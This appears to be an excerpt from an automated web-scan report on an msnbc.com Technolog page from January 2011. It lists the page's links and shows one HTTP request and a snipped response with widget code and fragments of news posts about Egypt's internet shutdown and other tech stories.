http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/technolog/style.css?v=23247
http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1695256702&do=msnbc.msn.com&ad=53:9:80;44::;56:27:108;58:58:178;58:58:178;58:58:178;53:9:80;86:86:270;87:87:209;50::
http://lynch.foreignpolicy.com/posts/2011/01/26/will_the_arab_revolutions_spread
http://malexj.tk/6M
http://malexj.wordpress.com/
http://mashable.com/2010/10/26/nexus-two/
http://mashable.com/2011/01/26/htc-to-unveil-2-facebook-phones-next-month/
http://mashable.com/2011/01/27/youtube-flickr-show-escalating-violence-in-egyptian-protests/
http://michaelwann.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nasaengineer.com/
http://news.bbc.co.uk/2/hi/8548190.stm
http://news.discovery.com/
http://news.sciencemag.org/scienceinsider/
http://nightly.msnbc.com/
http://phx.corporate-ir.net/phoenix.zhtml?c=176060&p=irol-newsArticle&ID=1521090&highlight=
http://planetary.org/blog
http://platform.twitter.com/widgets.js
http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://redtape.msnbc.com/
http://redtape.msnbc.com/2009/06/twitter-1-censorship-0-why-its-working.html
http://redtape.newsvine.com/
http://renesys.com/about/index.shtml
http://science.slashdot.org/
http://seedmagazine.com/
http://spacefellowship.com/
http://suzanne-choney.newsvine.com/
http://techcrunch.com/2010/07/19/kindle-sales/
http://techcrunch.com/2011/01/27/kindle-books-overtake-paperback-books-to-become-amazons-most-popular-format/
http://techcrunch.com/2011/01/28/egypt/
http://technolog2.newsvine.com/
http://thelede.blogs.nytimes.com/
http://today.msnbc.com/
http://toddkenreck.newsvine.com/
http://trueslant.com/milesobrien/
http://tv.msnbc.com/
http://twitter.com/
http://twitter.com/?q=%23Egypt
http://twitter.com/HelenASPopkin
http://twitter.com/MichaelWann
http://twitter.com/WindaBenedetti
http://twitter.com/b0yle
http://twitter.com/helenaspopkin
http://twitter.com/malexjohnson
http://twitter.com/share
http://twitter.com/windabenedetti
http://twitter.com/wjrothman
http://valleywag.gawker.com/5743293/facebook-mobile-says-to-call-911
http://wbenedetti.newsvine.com/
http://www-03.ibm.com/innovation/us/watson/
http://www.almasryalyoum.com/en/subchannel/Top%20stories
http://www.att.com/gen/press-room?pid=18952&cdvn=news&newsarticleid=31519&mapcode=financial
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.boingboing.net/2011/01/28/online-science-ficti.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+boingboing%2FiBag+%28Boing+Boing%29
http://www.businessinsider.com/facebook-phone-wont-be-a-new-platform-2011-1
http://www.businessinsider.com/microsoft-1978-photo-2011-1
http://www.businessinsider.com/sai
http://www.byjohnroach.com/
http://www.cdt.org/
http://www.cityam.com/news-and-analysis/facebook-launch-first-mobile-phone
http://www.collectspace.com/
http://www.crunchgear.com/2011/01/27/photographers-youre-now-officially-free-to-shoot-in-public-places-and-outside-federal-buildings/
http://www.dailygrail.com/
http://www.delish.com/
http://www.dreichel.com/dr_zoe.htm
http://www.economist.com/node/18013760
http://www.eiu.com/public/
http://www.engadget.com/2011/01/26/sony-ericsson-xperia-play-playstation-phone-preview/
http://www.everyblock.com/
http://www.facebook.com/HelenASPopkin
http://www.facebook.com/anarchismnews/posts/180233175348223
http://www.facebook.com/cosmiclog
http://www.facebook.com/help/?search=known+issues
http://www.facebook.com/home.php?id=1151660271
http://www.facebook.com/pages/Alex-Johnson-msnbccom/136854296350964
http://www.facebook.com/pages/manage/
http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://cosmiclog.msnbc.redacted/_news/2011/01/27/5935463-search-engines-could-play-jeopardy?chromedomain=technolog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/26/5926152-sonys-playstation-phone-is-for-real?chromedomain=technolog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/27/5931513-sony-reveals-psp-successor-the-next-generation-portable?chromedomain=technolog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/27/5935136-android-getting-games-from-sony?chromedomain=technolog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5925209-locked-out-of-facebook-happy-data-privacy-day-
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5925380-ignore-facebook-messages-to-call-911-
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5926146-rumor-facebook-phones-are-coming
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5926198-egypt-may-be-blocking-twitter-and-facebook-as-protests-grow
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5934345-pre-caffeine-tech-security-cracks-70s-nerds
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5934826-verizon-offering-att-iphone-trade-in-program
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5935542-mysterious-roy-castillo-haunts-facebook
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5935983-dont-worry-wi-fi-only-tablets-are-coming
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5940731-kindle-books-now-outsell-paperbacks
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5940742-pre-caffeine-tech-man-vs-the-internet
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5940974-facebook-deprived-man-sues-for-500k
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941456-infograph-egypt-drops-off-the-internet
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941852-this-is-about-social-networks-that-are-beyond-the-reach-of-mubarak
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941854-is-internet-access-a-human-right
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://worldblog.msnbc.redacted/_news/2011/01/27/5936053-watching-egypts-protests?chromedomain=technolog
http://www.facebook.com/technolog
http://www.facebook.com/terms.php
http://www.facebook.com/todd.kenreck
http://www.facebook.com/topic.php?uid=31987371885&topic=14747&post=70129
http://www.facebook.com/topic.php?uid=31987371885&topic=14769
http://www.flickr.com/photos/aljazeeraenglish/
http://www.geekpress.com/
http://www.google.com/
http://www.guardian.co.uk/world/blog/2011/jan/27/egypt-protests
http://www.habitablezone.com/space/
http://www.herdict.org/web/
http://www.hobbyspace.com/
http://www.hotmail.com/
http://www.humanrightsfirst.org/
http://www.livescience.com/
http://www.macrumors.com/2011/01/26/verizon-iphone-pre-orders-to-start-at-3am-et-on-february-3rd-offering-atandt-trade-ins/
http://www.mobilecrunch.com/2011/01/27/the-elusive-white-iphone-appears-on-the-german-apple-website/
http://www.mobileworldcongress.com/
http://www.nasaspaceflight.com/
http://www.nasawatch.com/
http://www.newsvine.com/
http://www.nydailynews.com/ny_local/2011/01/26/2011-01-26_man_sues_facebook_claiming_socialnetworking_site_shut_down_his_account_for_no_re.html
http://www.nypost.com/f/print/news/local/staten_island/si_man_hits_facebook_with_suit_rMmqxdBwUg9UJpHI8WIDIK
http://www.nypost.com/p/news/local/manhattan/antisocial_network_WIiiaZ4tHPBHHlXx4GuG5I
http://www.outofthecradle.net/
http://www.pitpi.org/
http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247
http://www.polls.newsvine.com/_static/css/ffb30d0d6c6ea0fa18ad06ed093685a55fe064e8.css?v=23247
http://www.polls.newsvine.com/_static/js/6fcc5bd2a149dc02951529f95ade36053a0ff882.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg
http://www.polls.newsvine.com/_vine/images/users/600/athima-chansanchai/5941352.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5936454.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5941467.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942421.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg
http://www.polls.newsvine.com/_vine/images/users/600/wbenedetti/5932923.jpg
http://www.polls.newsvine.com/_vine/images/users/600/wbenedetti/5933512.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5940889.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5941146.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5941346.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5934467.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5935650.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5936378.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5940823.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/suzanne-choney/5925431.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/suzanne-choney/5927180.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/wbenedetti/5927996.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://www.popsci.com/
http://www.popularmechanics.com/
http://www.renesys.com/blog/2011/01/egypt-leaves-the-internet.shtml
http://www.scidev.net/
http://www.scienceblog.com/cms/index.php
http://www.scienceblogs.com/
http://www.sciencenews.org/
http://www.scientificamerican.com/blog/observations/
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.space.com/
http://www.spacedaily.com/
http://www.spacepolitics.com/
http://www.spotonpr.com/egypt-facebook-demographics/
http://www.state.gov/secretary/rm/2010/01/135519.htm
http://www.telegraph.co.uk/news/worldnews/europe/russia/8284279/Black-Widow-attempted-New-Year-Moscow-attack-but-blew-herself-up-by-mistake.html
http://www.thecaseforpluto.com/
http://www.thecaseforpluto.com/cover.jpg
http://www.thespacereview.com/
http://www.transterrestrial.com/
http://www.twitter.com/MAlexJohnson
http://www.twitter.com/suzannechoney
http://www.twitter.com/wjrothman
http://www.unmannedspaceflight.com/
http://www.urlesque.com/2011/01/27/bear-grylls-vs-les-stroud/
http://www.urlesque.com/2011/01/27/old-spice-guy-isaiah-mustafa-back/
http://www.vodafone.com/content/index/press.html
http://www.wired.com/threatlevel/2011/01/fbi-anonymous/
http://www.wolframalpha.com/
http://www.youtube.com/
http://www.youtube.com/results?search_query=egypt+protest+2011&aq=0sx
http://www.youtube.com/results?search_query=mubarak+protest&aq=f
http://www.youtube.com/v/12rNbGf2Wwo&hl=en_US&fs=1
http://www.youtube.com/v/JORCXkSKvf0&hl=en_US&fs=1
http://www.youtube.com/v/Jjd6CGckke0&hl=en_US&fs=1
http://www.youtube.com/v/YtTUsqra-MU&hl=en_US&fs=1
http://www.youtube.com/v/q_AF1t1KeZ8&hl=en_US&fs=1
http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1
http://www.youtube.com/v/xnQgaMOZLRc&hl=en_US&fs=1
http://www.youtube.com/watch?v=4L-ueFdKzjc&feature=player_embedded
http://www.youtube.com/watch?v=YtTUsqra-MU
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://twitter.com/ToddKenreck
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

GET /_nv/more/section/archive?date=2011/1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=296
Date: Sun, 30 Jan 2011 02:52:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 243531

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/ffb30d0d6c6ea0fa18ad06ed093685a55fe064e8.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/6fcc5bd2a149dc02951529f95ade36053a0ff882.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1695256702&do=msnbc.redacted&ad=53:9:80;44::;56:27:108;58:58:178;58:58:178;58:58:178;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<p>"If you go beyond the weekend, real damage is done to capital flow and banking," Neil Hicks, international policy analyst for <a href="http://www.humanrightsfirst.org/">Human Rights First</a> told msnbc.com, citing a report from the <a href="http://www.eiu.com/public/">Economist Intelligence Unit</a>
...[SNIP]...
<p>It's counterproductive, Hicks explained, citing Secretary of State Hillary Clinton's <a href="http://www.state.gov/secretary/rm/2010/01/135519.htm">January 21 speech on Internet freedom</a>
...[SNIP]...
<p>"We've never had a lab in which to see what percentage of a country's economy relies on the Internet," Jim Cowie, chief technology officer of the global Internet monitoring firm <a href="http://renesys.com/about/index.shtml">Renesys</a>
...[SNIP]...
<em>Catch up with Wilson on Twitter at <a href="http://www.twitter.com/wjrothman">@wjrothman</a>, or join our conversation at the <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday" data-Text="Net-less Egypt may face economic doom Monday">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942650-net-less-egypt-may-face-economic-doom-monday" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5942669" data-contentId="5942669" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942669.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942669.jpg" width="600" height="672" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Anyhoo … T-Pain really likes Facebook too … at least his latest tattoo indicates such. The Grammy-winning hip-hop artist shared a picture of his new ink on Twitter today, <a href="http://twitter.com/#!/NBTPAIN/status/30855244816584704">with this explanation </a>
...[SNIP]...
<div id="vine-inlinePhoto__5942671" data-contentId="5942671" class="inlinePhoto photo_portrait photo_align_block user_inline_photo" style="width:238px;"><img id="helenaspopkin/5942671.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942671.jpg" width="238" height="320" alt="" />
...[SNIP]...
</param><embed src="http://www.youtube.com/v/w0nFpwPuk8E&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Follow her on <a href="http://twitter.com/helenaspopkin"><span>
...[SNIP]...
</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><span>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" data-Text="T-Pain's Facebook tattoo so hardcore, it's hexacore!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5942421" data-contentId="5942421" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5942421.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5942421.jpg" width="600" height="339" alt="" />
...[SNIP]...
<em><a href="http://techcrunch.com/2011/01/28/egypt/">via TechCrunch</a>
...[SNIP]...
<div id="vine-inlineCode__5942398" class="inlineCode photo_align_block" data-contentid="5942398"><script src="http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630"></script>
...[SNIP]...
<em>Join the coversation on our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution" data-Text="Jon Stewart questions Egypt's 'Twitter revolution'">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5942345-jon-stewart-questions-egypts-twitter-revolution" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>A spam message wishing a Russian woman happy new year may very well have killed her, and saved hundreds of intended targets, according to an account by <a target="_blank" href="http://www.telegraph.co.uk/news/worldnews/europe/russia/8284279/Black-Widow-attempted-New-Year-Moscow-attack-but-blew-herself-up-by-mistake.html">The Telegraph's Moscow correspondent, Andrew Osborn</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5942012-did-spam-text-kill-a-russian-suicide-bomber" data-Text="Did spam text kill a Russian suicide bomber?">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
